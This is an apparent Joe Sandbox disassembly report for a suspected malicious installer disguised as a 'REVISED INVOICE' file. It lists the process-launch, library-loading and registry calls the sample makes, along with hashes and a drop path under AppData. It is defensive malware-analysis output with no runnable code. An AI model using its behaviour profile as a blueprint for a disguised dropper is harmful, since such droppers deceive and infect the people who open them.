                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                • String ID: %s%S.dll
                                                                                                • API String ID: 2200240437-2744773210
                                                                                                • Opcode ID: 8eb02a3bbd68b69db90ac38405ec0e3d1a99f1663c9491293569e02019d06da0
                                                                                                • Instruction ID: 006adf5c24d44cc190f28e383f23d96ea846dcb1794efbef959ff2cbc64c9496
                                                                                                • Opcode Fuzzy Hash: 8eb02a3bbd68b69db90ac38405ec0e3d1a99f1663c9491293569e02019d06da0
                                                                                                • Instruction Fuzzy Hash: D6F09030910119EBDB14AB68DD4DEAB366CAB00304F104476A906F21E1E77CEA68CBE9
                                                                                                APIs
                                                                                                  • Part of subcall function 0040517E: lstrlenW.KERNEL32(004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
                                                                                                  • Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
                                                                                                  • Part of subcall function 0040517E: lstrcatW.KERNEL32(004216E8,00403160,00403160,004216E8,00000000,0040FEC0,00000000), ref: 004051D9
                                                                                                  • Part of subcall function 0040517E: SetWindowTextW.USER32(004216E8,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160), ref: 004051EB
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239
                                                                                                  • Part of subcall function 004056FF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425710,Error launching installer), ref: 00405728
                                                                                                  • Part of subcall function 004056FF: CloseHandle.KERNEL32(00409300), ref: 00405735
                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                • CloseHandle.KERNEL32(?), ref: 00401EDE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 3585118688-0
                                                                                                • Opcode ID: 8cf45324bb1821324f6701a5a93a2ef5b5dd24fd189bc3be5f8f79f524039af8
                                                                                                • Instruction ID: f6705c9319aae76dbd7499045e6368890872edf6032e54a723c1862b254634bc
                                                                                                • Opcode Fuzzy Hash: 8cf45324bb1821324f6701a5a93a2ef5b5dd24fd189bc3be5f8f79f524039af8
                                                                                                • Instruction Fuzzy Hash: 7611A131900108EBCF21AFA1CD8499E7AB6EB04314F24407BF601B61E1C7798A819B9D
                                                                                                APIs
                                                                                                  • Part of subcall function 00405A7E: CharNextW.USER32(?), ref: 00405A8C
                                                                                                  • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405A91
                                                                                                  • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405AA9
                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                  • Part of subcall function 0040564D: CreateDirectoryW.KERNEL32(?,00409300,C:\Users\user\AppData\Local\Temp\), ref: 00405690
                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\fona\Kvit,?,00000000,000000F0), ref: 00401645
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\fona\Kvit, xrefs: 00401638
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                • String ID: C:\Users\user\AppData\Local\fona\Kvit
                                                                                                • API String ID: 1892508949-989027284
                                                                                                • Opcode ID: a111ae99a2075552ceec04d01c2d287026f6d6b7d174f27c13d9c2f1000a16b6
                                                                                                • Instruction ID: 9984d83288963ddb5bfb53596c8c9f6ed7fbdeacdcadece23b283b8c4b9f7bd6
                                                                                                • Opcode Fuzzy Hash: a111ae99a2075552ceec04d01c2d287026f6d6b7d174f27c13d9c2f1000a16b6
                                                                                                • Instruction Fuzzy Hash: 70119331504505EBCF206FA48D4199F3AB1EF44368B24097BEA05B61F2D63A4A819E5E
                                                                                                APIs
                                                                                                • IsWindowVisible.USER32(?), ref: 00405121
                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405172
                                                                                                  • Part of subcall function 0040412F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404141
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                • String ID:
                                                                                                • API String ID: 3748168415-3916222277
                                                                                                • Opcode ID: e363e72c763df8ca6100096d80b3df6051651a231830df88c35e98c850c37b72
                                                                                                • Instruction ID: 7511a9737e1ae187a562f2e55163cfa394ea92b9daba136d2a61478abf79871a
                                                                                                • Opcode Fuzzy Hash: e363e72c763df8ca6100096d80b3df6051651a231830df88c35e98c850c37b72
                                                                                                • Instruction Fuzzy Hash: 41015E71A40709BBDF219F11DD84B6B3626E794754F144136FA017E1D1C3BA8C919E2D
                                                                                                APIs
                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425710,Error launching installer), ref: 00405728
                                                                                                • CloseHandle.KERNEL32(00409300), ref: 00405735
                                                                                                Strings
                                                                                                • Error launching installer, xrefs: 00405712
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                • String ID: Error launching installer
                                                                                                • API String ID: 3712363035-66219284
                                                                                                • Opcode ID: b8225b8e790b3fd0efe802e75bacfbac7fa780f619c07fe13b6fa50099ed031b
                                                                                                • Instruction ID: 0e3d6bea0253e84bb75e95f5fd13ebb7f1c25267a9e23a2e11a0c59c818b3a51
                                                                                                • Opcode Fuzzy Hash: b8225b8e790b3fd0efe802e75bacfbac7fa780f619c07fe13b6fa50099ed031b
                                                                                                • Instruction Fuzzy Hash: A1E0BFB4A50209BFEB10AB64ED45F7B77ADE704604F408521BD10F6190D774A9118A79
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f1b0bcb74e89e0527ce0e7aeb25a080aa3b7917c16b08ac734cf8879bcce8d5f
                                                                                                • Instruction ID: 5fe4abb7369df3af91b149f2edb7ea720d50bcc67b973f9abb1089395dd24c70
                                                                                                • Opcode Fuzzy Hash: f1b0bcb74e89e0527ce0e7aeb25a080aa3b7917c16b08ac734cf8879bcce8d5f
                                                                                                • Instruction Fuzzy Hash: C0A14471E00229CBDF28CFA8C8546ADBBB1FF44305F11856AD956BB281C7785A96CF44
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4d9f9556e65149fb8038c12abebdeeaff41015fbe822045bf8c0f712664e9a4c
                                                                                                • Instruction ID: 7dc68a506d8d0f3fe9b520a6289ddaa7cfd75a66a39107a8603bac83b987cce9
                                                                                                • Opcode Fuzzy Hash: 4d9f9556e65149fb8038c12abebdeeaff41015fbe822045bf8c0f712664e9a4c
                                                                                                • Instruction Fuzzy Hash: 58912370D00229CBDF28CFA8C854BADBBB1FF44305F15816AD956BB291C7789A96CF44
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fedee03a87f183305429df1632bc9847bb667c1ae34a6a4f86b425fb5205d62c
                                                                                                • Instruction ID: aa61b8b4d6b896fc10b82c5715850ba22d426d73d4dcb40af3c311b95fbd5bbf
                                                                                                • Opcode Fuzzy Hash: fedee03a87f183305429df1632bc9847bb667c1ae34a6a4f86b425fb5205d62c
                                                                                                • Instruction Fuzzy Hash: 1B815671E00229CFDF24CFA8C844BADBBB1FB44305F25816AD456BB291C7789A96CF54
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e8c959f377d96a3870dba63dd65060f52c5bbf460a72db2a5b2be4756d911549
                                                                                                • Instruction ID: 6afa8d85982321809285efd67767f231e28451523f56623c0a237c64ba690010
                                                                                                • Opcode Fuzzy Hash: e8c959f377d96a3870dba63dd65060f52c5bbf460a72db2a5b2be4756d911549
                                                                                                • Instruction Fuzzy Hash: 7E816731E00229DBDF24CFA9D844BADBBB0FB44305F11816AE856BB2C0C7785A96DF44
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0a8ee5da33216ad141207925d20784d11e66eebf924bd7a5457e3a8945fa9096
                                                                                                • Instruction ID: b0afa4bf9b2f32aef8b418d90c6ac84aec3754d6d6600e102a8a9184c58ea877
                                                                                                • Opcode Fuzzy Hash: 0a8ee5da33216ad141207925d20784d11e66eebf924bd7a5457e3a8945fa9096
                                                                                                • Instruction Fuzzy Hash: FD712471E00229DFDF24CFA8C844BADBBB1FB48305F15806AD846BB290C7395996DF54
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 62bad76ded8dc27f8eed87459cf3b90d4506ad753805ad6fcc8c39a10a3f4707
                                                                                                • Instruction ID: 02d0d75cb83947f83aad45c50880e4a386b83e744e149296eb7fa161ab999f08
                                                                                                • Opcode Fuzzy Hash: 62bad76ded8dc27f8eed87459cf3b90d4506ad753805ad6fcc8c39a10a3f4707
                                                                                                • Instruction Fuzzy Hash: 08714671E00219CFDF24CFA8C844BADBBB1FB44305F15806AD856BB290C7385956DF44
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: aa3d38d161a72bddb6f80e1dac2624ab657c9951173fd352498b2eb393463e7a
                                                                                                • Instruction ID: eb15c3353e008649bdc799d0a197d89dfb60748dd6a42a5e4cae05a50034cddc
                                                                                                • Opcode Fuzzy Hash: aa3d38d161a72bddb6f80e1dac2624ab657c9951173fd352498b2eb393463e7a
                                                                                                • Instruction Fuzzy Hash: 67714571E00229DBDF28CF98C844BADBBB1FF44305F11806AD956BB291C7789A66DF44
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                  • Part of subcall function 0040517E: lstrlenW.KERNEL32(004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
                                                                                                  • Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
                                                                                                  • Part of subcall function 0040517E: lstrcatW.KERNEL32(004216E8,00403160,00403160,004216E8,00000000,0040FEC0,00000000), ref: 004051D9
                                                                                                  • Part of subcall function 0040517E: SetWindowTextW.USER32(004216E8,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160), ref: 004051EB
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 334405425-0
                                                                                                • Opcode ID: 601e69b8988a7be783b9bf71a199474bccdecbb6df60d32c779fdf807402afc7
                                                                                                • Instruction ID: 21b843afec6b7294a3944f79e0bc8b5a0bfae5b7739fd4420ef7f1bee797e933
                                                                                                • Opcode Fuzzy Hash: 601e69b8988a7be783b9bf71a199474bccdecbb6df60d32c779fdf807402afc7
                                                                                                • Instruction Fuzzy Hash: D0219531904219FBCF20AFA5CE48A9E7EB1AF00354F60427BF500B51E1C7B98E81DA5E
                                                                                                APIs
                                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNEL32 ref: 00402CF1
                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004024E0
                                                                                                • RegCloseKey.KERNEL32(?), ref: 004024F6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Enum$CloseOpenValue
                                                                                                • String ID:
                                                                                                • API String ID: 167947723-0
                                                                                                • Opcode ID: 5da5b43d6b5314da3b6e243800128a6a8307b3d5b775bc4a78521cf42ee0db5a
                                                                                                • Instruction ID: 9b49ef4685d11130b37b7b0c6276d492a5168a4a944959f4997216c5b5c768b0
                                                                                                • Opcode Fuzzy Hash: 5da5b43d6b5314da3b6e243800128a6a8307b3d5b775bc4a78521cf42ee0db5a
                                                                                                • Instruction Fuzzy Hash: 1FF06D72A04204BBE7209F659E88ABF766DEF80354B10843AF505B61D0D6B85D419B6A
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\fona\Kvit,?), ref: 00401E52
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\fona\Kvit, xrefs: 00401E3B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
